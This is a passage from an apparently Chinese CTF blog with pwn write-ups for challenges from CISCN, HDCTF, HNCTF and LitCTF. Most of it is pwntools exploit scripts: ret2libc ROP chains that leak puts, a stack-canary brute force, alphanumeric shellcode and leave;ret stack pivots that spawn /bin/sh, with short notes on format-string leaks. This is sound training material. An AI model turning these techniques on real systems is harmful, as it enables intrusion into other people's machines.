p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)<br>\u200b<br>io.sendlineafter(b'story!', payload2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 
2019\u4e1c\u5317]PWN2<\/h2>\n\n\n\n<p>\u653e\u592a\u4e45\u5fd8\u4e86\uff0c\u597d\u50cf\u662f\u672c\u5730\u5c31\u662f\u6253\u4e0d\u901a\uff0c\u8fdc\u7a0b\u80fd\u8fc7<\/p>\n\n\n\n<p>\u4f46\u662f\u6709\u4fe9exp\uff0c\u60f3\u4e0d\u8d77\u6765\u5230\u5e95\u54ea\u7248\u80fd\u7528\u4e86\uff0c\u90fd\u8d34\u4e00\u4efd\u4ee5\u793a\u656c\u610f\uff08\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = \"debug\"<br>\u200b<br>#io = remote(\"node5.anna.nssctf.cn\",28952)<br>io = process(\".\/pwn\")<br>elf = ELF(\".\/pwn\")<br>libc = ELF(\".\/libc6_2.27-0ubuntu2_amd64.so\")<br>\u200b<br>\u200b<br>ret = 0x00000000004006b9<br>pop_rdi = 0x0000000000400c83<br>puts_plt = elf.plt&#91;'puts'] &nbsp;<br>puts_got = elf.got&#91;'puts']<br>en_addr = 0x00000000004009A0<br>\u200b<br>print(hex(puts_plt))<br>print(hex(puts_got))<br>\u200b<br>\u200b<br>\u200b<br>offset = 0x50+8<br>\u200b<br>io.sendlineafter(b\"Input your choice!\\n\", b'1')<br>\u200b<br>\u200b<br>pd = b'A' * offset &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br>pd += p64(pop_rdi) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br>pd += p64(puts_got) &nbsp; &nbsp; &nbsp; &nbsp; <br>pd += p64(puts_plt) &nbsp; &nbsp; &nbsp; &nbsp; <br>pd += p64(en_addr) <br>\u200b<br>#gdb.attach(io)<br>io.sendlineafter(b\"Input your Plaintext to be encrypted\\n\", pd)<br>\u200b<br>leak = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>log.info(f\"Leaked puts@libc: {hex(leak)}\")<br>\u200b<br> <br>libc_base = leak - libc.sym&#91;'puts'] <br>log.info(f\"Libc base: {hex(libc_base)}\")<br>system_addr = libc_base + libc.sym&#91;'system']<br>binsh_addr = libc_base + next(libc.search(b'\/bin\/sh\\x00'))<br>\u200b<br>\u200b<br>log.success(f\"system:{hex(system_addr)}\")<br>log.success(f\"bin_sh:{hex(binsh_addr)}\")<br>\u200b<br>pd2 &nbsp;= b'a' * offset &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>pd2 += p64(pop_rdi) &nbsp; &nbsp; <br>pd2 += p64(binsh_addr) &nbsp; &nbsp;<br>pd2 += p64(ret)<br>pd2 += 
p64(system_addr)<br>\u200b<br>io.sendlineafter(b\"Input your Plaintext to be encrypted\\n\", pd2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>leak = lambda name,content: log.success('{}={:#x}'.format(name,content))<br>p = process(\".\/pwn\")<br>p.sendline(b'1')<br>elf = ELF('.\/pwn')<br>rdi = 0x0400c83<br>ret = 0x04006b9<br>encrypt_addr = 0x04009A0<br>main_addr = 0x0400B28<br>strlen_got = elf.got['strlen']<br>puts_got = elf.got['puts']<br>puts_plt = elf.plt['puts']<br>payload = b'a'*(0x50+8) + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr)<br>p.sendline(payload)<br>p.recvuntil(b'oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\\x83\\x0c@\\n')<br>puts_addr = u64(p.recvuntil(b'\\n',drop=True).ljust(8,b'\\x00'))<br>leak('puts_addr',puts_addr)<br>libc = ELF('.\/libc6_2.27-0ubuntu2_amd64.so')<br>libc_base = puts_addr - libc.sym['puts']<br>system_addr = libc_base + libc.sym['system']<br>bin_sh = libc_base + next(libc.search(b'\/bin\/sh'))<br>leak('libc_base',libc_base)<br>leak('system_addr',system_addr)<br>leak('bin_sh',bin_sh)<br>payload1 = b'a'*0x50 + b'a'*8 +p64(rdi) + p64(bin_sh) + p64(ret) + p64(system_addr)<br>p.send(payload1)<br>p.interactive()<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2019\u534e\u5357]PWN3<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>\u200b<br>io = process(\".\/pwn\")<br>\u200b<br>offset = 0x10 + 8 <br>gadget = 0x0000000004004D6<br>ret = 0x00000000004003a9<br>\u200b<br>pd = b'a'*offset<br>pd += p64(ret)<br>pd += p64(gadget)<br>\u200b<br>\u200b<br>gdb.attach(io)<br>io.send(pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2023 \u521d\u8d5b]\u70e7\u70e4\u644a\u513f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>\u200b<br>context(os=\"linux\", arch=\"amd64\", 
log_level=\"debug\")<br>\u200b<br>io = remote(\"node4.anna.nssctf.cn\",28253)<br>\u200b<br>\u200b<br>io.sendlineafter(b'&gt; ', b'2')<br>io.sendline(b'1')<br>io.sendline(b'-999999')<br>io.sendline(b'4')<br>io.sendline(b'5')<br>\u200b<br>syscall &nbsp; &nbsp; &nbsp; &nbsp; = 0x0000000000402404<br>pop_rdi_ret &nbsp; &nbsp; = 0x000000000040264f<br>pop_rdx_rbx_ret = 0x00000000004a404b<br>pop_rsi_ret &nbsp; &nbsp; = 0x000000000040a67e<br>name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;= 0x00000000004E60F0<br>pop_rax_ret &nbsp; &nbsp; = 0x0000000000458827<br>ret &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; = 0x000000000040101a<br>payload = b'\/bin\/sh\\x00' + b'a' * 0x20 + p64(pop_rax_ret) + p64(59) + p64(pop_rdi_ret) + p64(name) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_rbx_ret) + p64(0) + p64(0) + p64(syscall)<br>io.sendlineafter(\"\u8bf7\u8d50\u540d\uff1a\\n\", payload)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2023 \u521d\u8d5b]funcanary<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>elf = ELF('.\/service')<br>p = process('.\/service')<br>#p=remote('node5.anna.nssctf.cn',27873)<br>p.recvuntil('welcome\\n')<br>canary = b'\\x00'<br>\u200b<br>for k in range(7):<br> &nbsp; &nbsp;for i in range(256):<br> &nbsp; &nbsp; &nbsp; &nbsp;p.send(b'a'*0x68 + canary + p8(i))<br> &nbsp; &nbsp; &nbsp; &nbsp;a = p.recvuntil(\"welcome\\n\")<br> &nbsp; &nbsp; &nbsp; &nbsp;if b\"fun\" in a:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;canary += p8(i)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(b\"canary: \" + canary)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>catflag = 0x0231<br>while(1):<br> &nbsp; &nbsp;for i in range(16):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = b'A' * 0x68 + canary + b'A' * 8 + p16(catflag)<br> &nbsp; &nbsp; &nbsp; &nbsp;p.send(payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;#pause()<br> &nbsp; &nbsp; 
&nbsp; &nbsp;a = p.recvuntil(\"welcome\\n\",timeout=1)<br> &nbsp; &nbsp; &nbsp; &nbsp;print(a)<br> &nbsp; &nbsp; &nbsp; &nbsp;if b\"welcome\" in a:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;catflag += 0x1000<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue<br> &nbsp; &nbsp; &nbsp; &nbsp;if b\"NSSCTF\" in a:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(a)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>\u200b<br>p.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]pwnner<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"node5.anna.nssctf.cn\",21999)<br>payload=b'a'*(0x40+0x08)+p64(0x4008B2)<br>io.sendlineafter(b'name:',b'1956681178')<br>io.sendlineafter(b'next?',payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]ezr0p64<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>elf = ELF(\".\/pwn\")<br>libc = ELF(\".\/libc.so.6\")<br>\u200b<br>\u200b<br>io = remote(\"node5.anna.nssctf.cn\",27494)<br>\u200b<br>io.recvuntil(b'Gift :')<br>puts_addr = io.recvuntil(b'\\n')&#91;0:14]<br>success(f\"puts_addr : {puts_addr}\")<br>\u200b<br>libc_base = int(puts_addr,16) - libc.symbols&#91;'puts']<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>offset = 0x100 + 8<br>\u200b<br>ret = 0x000000000040101a<br>rdi = 0x00000000004012a3<br>pd = b'a' * offset<br>pd += p64(ret)<br>pd += p64(rdi)<br>pd += p64(bin_sh_add)<br>pd += p64(system_add)<br>\u200b<br>io.sendline(pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]safe_shellcode<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(arch='amd64', os='linux', log_level='debug')<br>io = remote(\"node5.anna.nssctf.cn\",29442)<br>#io = process('.\/pwn')<br>\u200b<br>shellcode = 
\"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t\"<br>io.send(shellcode)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[LitCTF 2023]\u72e0\u72e0\u7684\u6ea2\u51fa\u6d85~<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>\u200b<br>io = remote('node4.anna.nssctf.cn',28296)<br>#io=process(\".\/pwn\")<br>elf = ELF('.\/pwn')<br>libc= ELF('.\/libc-2.31.so')<br>\u200b<br>ret_add =0x0000000000400556<br>pop_rdi =0x00000000004007d3<br>main_add =0x0000000004006B0<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \",hex(puts_got))<br>print(\"Puts_plt: \",hex(puts_plt))<br>\u200b<br>offset=0x67<br>payload1 = b'\\x00'<br>payload1 += b'a' * (offset) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)<br>io.sendlineafter(b'message:', payload1)<br>io.recvuntil(b'Received\\n')<br>\u200b<br>puts_addr = u64(io.recvuntil('\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>print(\"Puts_addr: \",hex(puts_addr))<br>\u200b<br>\u200b<br>\u200b<br>libc_base = puts_addr - libc.symbols&#91;'puts']<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>payload2 = b'\\x00'<br>payload2 += b'a' * (offset) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)<br>\u200b<br>io.sendlineafter(b'message:', payload2)<br>io.recv()<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]KEEP ON<\/h2>\n\n\n\n<p>\u597d\u50cf\u4e00\u76f4\u6ca1\u6709\u4e13\u95e8\u5199\u8fc7\u5b8c\u6574\u7684\u6808\u8fc1\u79fb<\/p>\n\n\n\n<p>\u5c31\u8865\u4e2a\u6863\u5427<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>__int64 vuln()<br>{<br> &nbsp;char s&#91;80]; \/\/ &#91;rsp+0h] &#91;rbp-50h] BYREF<br>\u200b<br> &nbsp;memset(s, 0, sizeof(s));<br> 
&nbsp;puts(\"please show me your name: \");<br> &nbsp;read(0, s, 0x48uLL);<br> &nbsp;printf(\"hello,\");<br> &nbsp;printf(s);<br> &nbsp;puts(\"keep on !\");<br> &nbsp;read(0, s, 0x60uLL);<br> &nbsp;return 0LL;<br>}<\/code><\/pre>\n\n\n\n<p>%p\u57fa\u7840\u8c03\u8bd5\u5b9a\u4f4d\u683c\u4e32\u6808\u504f\u79fb<\/p>\n\n\n\n<p>\u6d4b\u51fa\u6765\u662fs\u6570\u7ec4\u57286<\/p>\n\n\n\n<p>s\u5728rbp-50\u7684\u5730\u65b9<\/p>\n\n\n\n<p>0x50\/8 = 10<\/p>\n\n\n\n<p>10+6 = 16<\/p>\n\n\n\n<p>rbp\u5728\u6808\u4e0a\u7684\u504f\u79fb\u5c31\u627e\u5230\u4e86<\/p>\n\n\n\n<p>\u6cc4\u9732\u4e00\u4e0b\u5c31\u597d\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-11.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"295\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-11.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-665\"  sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/div><\/figure>\n\n\n\n<p>leave<\/p>\n\n\n\n<p>retn<\/p>\n\n\n\n<p>\u8fd9\u4fe9\u5c31\u662f\u6808\u8fc1\u79fb\u7684\u6700\u6838\u5fc3\u4e4b\u5904\u4e86<\/p>\n\n\n\n<p>\u5176\u76f8\u5f53\u4e8e<\/p>\n\n\n\n<p>mov rsp rbp;<\/p>\n\n\n\n<p>pop 
rbp<\/p>\n\n\n\n<p>\u6b64\u65f6rsp\u4e0erbp\u4f4d\u4e8e\u4e86\u4e00\u4e2a\u5730\u5740\uff0c\u53ef\u4ee5\u73b0\u5728\u628a\u5b83\u4eec\u6307\u5411\u7684\u90a3\u4e2a\u5730\u5740\uff0c\u5373\u5f53\u6210\u6808\u9876\u53c8\u53ef\u4ee5\u5f53\u6210\u662f\u6808\u5e95\u3002\u7136\u540epop rbp\uff0c\u5c06<strong>\u6808\u9876\u7684\u5185\u5bb9<\/strong>\u5f39\u5165rbp\uff08\u6b64\u65f6\u6808\u9876\u7684\u5185\u5bb9\u4e5f\u5c31\u662frbp\u7684\u5185\u5bb9\uff0c\u4e5f\u5c31\u662f\u8bf4\u73b0\u5728\u628arbp\u7684\u5185\u5bb9\u8d4b\u7ed9\u4e86rbp\uff09\u3002\u56e0\u4e3arsp\u8981\u65f6\u523b\u6307\u5411\u6808\u9876\uff0c\u65e2\u7136\u6808\u9876\u7684\u5185\u5bb9\u90fd\u5f39\u8d70\u4e86\uff0c\u90a3\u4e48rsp\u81ea\u7136\u8981\u5f80\u4e0b\u632a\u4e00\u4e2a\u5185\u5b58\u5355\u5143<\/p>\n\n\n\n<p>\u8bf4\u56de\u9898\u76ee\uff0c\u4e3a\u4ec0\u4e48S\u53c8\u7b49\u4e8erbp &#8211; 0x60\u4e86\u5462\uff1f<\/p>\n\n\n\n<p>emmmm\uff0cgdb\u8c03\u8c03\u770b\u5c31\u597d\u4e86\uff0c\u4e0d\u591a\u5199\u4e86\uff0c\u4e24\u6b21\u8bfb\u5165\uff0c\u7b2c\u4e00\u6b21\u6cc4\u9732\u7b2c\u4e8c\u6b21\u8f93\u4e2abbbb\uff0csearch bbbb\u561b\uff08\uff09<\/p>\n\n\n\n<p>\u6b38\uff0c\u8fd9\u4e0bpd\u5c31\u80fd\u5199\u4e86<\/p>\n\n\n\n<p>rdi\u6709\u7684\uff0cleave\u6709\u7684\uff0csyscall\u6709\u7684<\/p>\n\n\n\n<p>\u6808\u6ea2\u51fa\u4e5f\u770b\u5230\u4e86<\/p>\n\n\n\n<p>ROP\u94fe\u5c31\u597d\u5199\u4e86<\/p>\n\n\n\n<p>\u597d\u50cf\u5199\u7684pd\u53ef\u8bfb\u6027\u6bd4\u8f83\u5dee\u2026\u2026<\/p>\n\n\n\n<p>\u5148\u5199\u4e1c\u897f<\/p>\n\n\n\n<p>vuln \u51fd\u6570\u7684\u8fd4\u56de\u6d41\u7a0b\u662f\u56fa\u5b9a\u7684\uff1a<code>leave\uff08\u539f\u6307\u4ee4\uff09\u2192 retn\uff08\u539f\u6307\u4ee4\uff09<\/code>\uff0c\u901a\u8fc7 pd \u8986\u76d6\u4e86\u4e24\u4e2a\u5173\u952e\u5730\u5740\uff0c\u8ba9\u8fd9\u4e2a\u6d41\u7a0b\u53d8\u6210 \u201c\u6808\u8fc1\u79fb\u89e6\u53d1\u6d41\u7a0b\u201d\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8986\u76d6\u300c\u4fdd\u5b58\u7684 rbp\u300d\uff1apd 
\u672b\u5c3e\u7684<code>p64(s)<\/code> \u2192 \u628a\u6808\u5e27\u57fa\u5740\u6539\u6210 s\uff1b<\/li>\n\n\n\n<li>\u8986\u76d6\u300c\u8fd4\u56de\u5730\u5740\u300d\uff1apd \u672b\u5c3e\u7684<code>p64(leave)<\/code> \u2192 \u628a\u8fd4\u56de\u5730\u5740\u6539\u6210 leave \u6307\u4ee4\u5730\u5740\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u9636\u6bb5 1 \u7684\u6267\u884c\u6b65\u9aa4\uff08\u51fd\u6570\u8fd4\u56de\u65f6\uff0c\u65e9\u4e8e\u6240\u6709 ROP \u6307\u4ee4\uff09\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u6267\u884c\u539f\u51fd\u6570\u7684leave\u6307\u4ee4\uff1a\n<ul class=\"wp-block-list\">\n<li><code>mov rsp, rbp<\/code> \u2192 rsp \u8df3\u8f6c\u5230\u4f60\u8986\u76d6\u7684\u300c\u4fdd\u5b58\u7684 rbp\u300d=s\uff1b<\/li>\n\n\n\n<li><code>pop rbp<\/code> \u2192 rsp+8\uff0crbp \u88ab\u66f4\u65b0\u4e3a s\uff08\u6b64\u65f6 rbp \u5df2\u65e0\u5173\u7d27\u8981\uff09\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\u6267\u884c\u539f\u51fd\u6570\u7684retn\u6307\u4ee4\uff1a\n<ul class=\"wp-block-list\">\n<li>\u5f39\u51fa\u6808\u9876\u7684\u300c\u8fd4\u56de\u5730\u5740\u300d=leave\uff08\u4f60\u8986\u76d6\u7684\uff09\uff0c\u8df3\u8f6c\u5230 leave \u6307\u4ee4\u6267\u884c\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\u6267\u884c\u4f60\u8986\u76d6\u7684leave\u6307\u4ee4\uff08\u7b2c\u4e8c\u6b21\u6267\u884c leave\uff09\uff1a\n<ul class=\"wp-block-list\">\n<li><code>mov rsp, rbp<\/code> \u2192 rsp \u518d\u6b21\u91cd\u7f6e\u4e3a s\uff08\u6808\u8fc1\u79fb\u7684\u6838\u5fc3\u4e00\u6b65\uff0c\u628a rsp \u56fa\u5b9a\u5230 s \u6570\u7ec4\u8d77\u59cb\uff09\uff1b<\/li>\n\n\n\n<li><code>pop rbp<\/code> \u2192 rsp+8\uff0c\u4f46\u6b64\u65f6 rsp \u5df2\u7ecf\u6307\u5411 s \u6570\u7ec4\uff0c\u6808\u8fc1\u79fb\u5b8c\u6210<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p>\u6808\u8fc1\u79fb\u5b8c\u6210\u540e\uff0crsp \u56fa\u5b9a\u5728 s \u6570\u7ec4\u8d77\u59cb\u5730\u5740\uff08s\uff09\uff0c\u7a0b\u5e8f\u7684\u6307\u4ee4\u6307\u9488\uff08rip\uff09\u4f1a\u81ea\u52a8\u6307\u5411 s\u2014\u2014 \u4e5f\u5c31\u662f pd 
\u524d\u9762\u7684<code>p64(0)<\/code>\u5730\u5740\uff0c\u5f00\u59cb\u6267\u884c ROP \u94fe\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7b2c\u4e00\u6b65\uff1a\u6267\u884c<code>p64(0)<\/code>\uff08\u65e0\u6548\u6307\u4ee4\uff09\uff1b<\/li>\n\n\n\n<li>\u7b2c\u4e8c\u6b65\uff1a\u6267\u884c<code>p64(ret)<\/code>\uff08\u8854\u63a5\u6307\u4ee4\uff09\uff1b<\/li>\n\n\n\n<li>\u7b2c\u4e09\u6b65\uff1a\u6267\u884c<code>p64(pop_rdi)<\/code>\uff08\u4f20\u53c2\u6307\u4ee4\uff09\uff1b<\/li>\n\n\n\n<li>&#8230; \u540e\u7eed\u6267\u884c<code>system<\/code>\u8c03\u7528\u3002<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = process(\".\/hdctf\")<br># io = remote(\"node4.anna.nssctf.cn\",28828)<br>elf = ELF(\".\/hdctf\")<br>\u200b<br>\u200b<br>pop_rdi = 0x00000000004008d3<br>ret = 0x00000000004005b9<br>syscall = elf.plt&#91;\"system\"]<br>leave = 0x00000000004007f2<br>\u200b<br>#gdb.attach(io)<br>io.sendline(b'%16$p')<br>io.recvuntil(b'hello,')<br>rbp = int(io.recv()&#91;2:14],16)<br>\u200b<br>rbp_addr = hex(rbp)<br>success(f\"rbp_addr = {rbp_addr}\")<br>\u200b<br>s = rbp - 0x60 <br>s_addr = hex(s)<br>success(f\"  s_addr = {s_addr}\")<br>\u200b<br>pd = b'aaaaaaaa' &nbsp;<br>pd += p64(ret)<br>pd += p64(pop_rdi)<br>pd += p64(s + 0x8*5)<br>pd += p64(syscall)<br>pd += b'\/bin\/sh\\x00'<br>pd = pd.ljust(0x50,b'a')<br>pd += p64(s)<br>pd += p64(leave)<br>print(pd)<br>\u200b<br>io.send(pd)<br>\u200b<br>\u200b<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 
2019\u4e1c\u5357]PWN2<\/h2>\n\n\n\n<p>\u6000\u7591\u5c31\u662fkeepon\u6bcd\u9898<\/p>\n\n\n\n<p>32\u4f4d\u7248\u672c\u800c\u5df2<\/p>\n\n\n\n<p>\u6539\u5199\u4e00\u70b9\u70b9\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u5c31\u4e0d\u591a\u5199\u4e86\uff0cexp\u91cc\u8fd8\u7b97\u6709\u70b9\u6ce8\u91ca\uff0c\u5e0c\u671b\u4ee5\u540e\u7684\u81ea\u5df1\/\u770b\u6211\u535a\u5ba2\u7684\u540e\u751f\u770b\u5f97\u61c2\uff08\u597d\u5427\uff0c\u5b9e\u9645\u4e0a\u662f\u6211\u71ac\u4e0d\u52a8\u4e86\uff0c\u5c31\u8fd9\u6837\u5427\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>#io = process(\".\/pwn\")<br>io = remote(\"node5.anna.nssctf.cn\",26611)<br>elf = ELF(\".\/pwn\")<br>\u200b<br>syscall = 0x08048559<br>ret = 0x080483a6<br>leave = 0x08048562<br>#\u6cc4\u6f0frbp\u5730\u5740<br>pd = b'a'*0x28<br>io.send(pd)<br>io.recvuntil(pd)<br>\u200b<br>rbp = u32(io.recv(4))<br>print(hex(rbp))<br>\u200b<br>#\u5730\u5740\u8ba1\u7b97<br>#ebp 0xffffcd68 \u2014\u25b8 0xffffcd78 \u25c2\u2014 0<br>#ebp \u524d\u540e\u53d8\u53160x10<br>padding = 0x10<br>#s_size<br>s = 0x28<br>#\u76ee\u6807target\u5730\u5740<br>target = rbp - padding - s<br>\u200b<br>#\u6784\u9020rop\u94fe<br>pd2 = p32(0)<br>pd2 += p32(ret)<br>pd2 += p32(syscall)<br>pd2 += p32(target+0x4*4)<br>pd2 += b'\/bin\/sh\\x00'<br>pd2 = pd2.ljust(0x28,b'a')<br>pd2 += p32(target)<br>pd2 += 
p32(leave)<br>\u200b<br>io.send(pd2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u7a81\u7136\u60f3\u8d77\u6765\u505a\u7684\u65f6\u5019\u5fd8\u4e86\u7684\u4e00\u4e2a\u5c0f\u7ec6\u8282\uff0c\u8fd8\u662f\u51b3\u5b9a\u8865\u5145\u4e00\u4e0b<\/p>\n\n\n\n<p>\u8fd9\u91ccu32\u80fd\u6253\u5305\u5230\u6570\u636e\u7684\u539f\u56e0\u662f<\/p>\n\n\n\n<p>printf\u7684\u622a\u6b62\u662f\u9760\u6536\u5230<code>\\0<\/code>\u5224\u65ad<\/p>\n\n\n\n<p>\u53ea\u8981\u628as\u6570\u7ec4\u5168\u90e8\u8986\u76d6\u6389\uff0c\u4e0d\u591a\u8986\u76d6pre_rbp\u7684\u56db\u5b57\u8282\u5185\u5bb9<\/p>\n\n\n\n<p>\u5c31\u80fd\u63a5\u6536\u5230s\u6570\u7ec4\u540e\u9762\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u53ea\u65364\u5b57\u8282\uff0c\u5c31\u521a\u597d\u662fpre_rbp<\/p>\n\n\n\n<p>\u6b38\uff0c\u597d\u4e86\uff0c\u5c31\u8fd9\u4e48\u4e2a\u60c5\u51b5<\/p>\n\n\n\n<p>\u6808\u8fc1\u79fb\u94fe\u6761\u8fd8\u662f\u86ee\u660e\u6670\u7684\uff0c\u5927\u5dee\u4e0d\u5dee\u5c31\u8fd9\u4e2a\u94fe\u8def<\/p>\n\n\n\n<p>\u6808\u8fc1\u79fb\uff0cleave\u7684\u827a\u672f\u8bf4\u662f<\/p>\n\n\n\n<p>\u4e3a\u4e86\u9762\u8bd5\uff0c\u8bb0\u5f97\u7262\u8bb0\u5176\u7b49\u4ef7\u7684\u6c47\u7f16\u6307\u4ee4\u662f<\/p>\n\n\n\n<p>mov rsp , rbp<\/p>\n\n\n\n<p>pop rbp<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]Minions<\/h2>\n\n\n\n<p>\u8fd9\u9898\u5c31\u7a0d\u5fae\u5199\u7ec6\u4e00\u70b9\uff0c\u8fd8\u662f\u86ee\u6709\u610f\u601d\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-12-1024x498.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"498\" 
data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-12-1024x498.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-666\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>key\u8981102\u624d\u80fd\u8fdb\u4e24read\uff0c\u8003\u8651\u600e\u4e48\u8fdbread<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-13.png'><img class=\"lazyload lazyload-style-1\" 